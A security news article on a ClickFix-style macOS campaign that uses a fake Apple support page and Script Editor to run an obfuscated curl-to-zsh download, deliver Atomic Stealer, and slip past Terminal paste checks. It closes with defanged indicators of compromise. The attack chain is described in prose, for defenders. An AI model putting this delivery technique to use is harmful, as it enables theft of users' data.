A newly identified ClickFix-style macOS attack demonstrates how threat actors are refining their techniques to evade security defenses. The campaign moves away from the traditional reliance on Terminal and instead uses macOS Script Editor as the primary execution vector. This change allows attackers to bypass controls designed to detect or block suspicious Terminal activity.
The shift is notable because it preserves the familiar ClickFix social engineering approach while altering how malicious commands are executed. By rerouting execution through macOS Script Editor, the attack reduces exposure to newer protections and introduces a different pathway that may be less scrutinized by both users and security tools.
A Shift in ClickFix-Style macOS Attack Techniques
For years, ClickFix campaigns have relied on social engineering tactics that trick users into copying and pasting malicious commands into the Terminal app. These instructions are often disguised as troubleshooting steps or routine maintenance tasks. However, this newly discovered ClickFix-style macOS attack abandons that approach entirely.
Instead, attackers now leverage macOS Script Editor as the primary execution vector. While Script Editor has previously been abused for malware delivery, its use in this context, combined with a browser-triggered workflow, represents a shift in strategy. Notably, the attack is initiated through an Apple-themed webpage, which plays a central role in deceiving users.
Jamf researchers noted that Apple attempted to mitigate Terminal-based abuse in macOS 26.4 by introducing a feature that scans pasted commands before execution. While this adds friction, attackers have responded by simply moving to a different tool, demonstrating the ongoing cat-and-mouse dynamic in cybersecurity.
The Role of the Apple-Themed Webpage
The attack begins with a convincing Apple-themed webpage designed to look like an official support page titled “Reclaim disk space on your Mac.” The page provides step-by-step instructions that closely mimic legitimate system maintenance guidance.
Users are instructed to run a cleanup script to free up storage space. When they click the “Execute” button, the page triggers an applescript:// URL scheme, which initiates the next stage of the attack.
This mechanism introduces several key differences from traditional ClickFix campaigns:
- The browser invokes the applescript:// URL scheme
- Users are prompted to use script Editor to open
- A pre-filled script appears automatically inside macOS Script Editor
- The user is encouraged to execute the script
This workflow reduces the need for manual input, making the attack smoother and potentially more convincing.
Execution Flow and Obfuscation
Once inside macOS Script Editor, the user is presented with a script that appears to perform legitimate cleanup operations. However, behind the scenes, the script executes an obfuscated shell command.
The command uses string manipulation via the tr utility to decode a hidden URL at runtime. Once decoded, it resolves to a remote server hosting the malicious payload. The command follows a familiar structure:
- Obfuscation: Encoded strings are transformed into valid URLs.
- Payload retrieval: A curl request fetches remote content, with the -k flag disabling TLS certificate validation.
- Execution: The downloaded content is piped directly into zsh, allowing in-memory execution without writing to disk.
If successful, this step delivers a second-stage payload, which is further obfuscated using base64 encoding and gzip compression.
Second-Stage Payload and Atomic Stealer
After decoding, the second-stage script downloads a Mach-O executable file to the /tmp directory. The script performs several actions:
- Downloads the binary from a remote server
- Removes extended file attributes
- Assigns execution permissions
- Executes the binary
The final payload has been identified as a variant of Atomic Stealer, an infostealer known for targeting sensitive user data.
This staged delivery method allows attackers to keep the initial script small and less detectable while reserving the primary malicious functionality for later execution.
Behavior Across macOS Versions
The behavior of macOS Script Editor during this attack varies depending on the operating system version. On macOS 26.0, the script opens directly, allowing immediate execution. However, macOS 26.4 introduces additional safeguards.
In newer versions, users see a warning indicating that the script originates from an unidentified developer. They must explicitly permit the creation and execution of the script document, adding another layer of user interaction.
Despite this, the attack still succeeds if users follow the prompts, highlighting the continued effectiveness of social engineering.
Indicators of Compromise
The researchers identified several indicators associated with this ClickFix-style macOS attack:
- Domain: dryvecar[.]com (linked to the infostealer payload)
- Malicious webpages:
- storage-fixes.squarespace[.]com
- cleanupmac.mssg[.]me
- File: helper (Mach-O executable)
- SHA256: 3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44
These indicators can help security teams detect and respond to related threats.
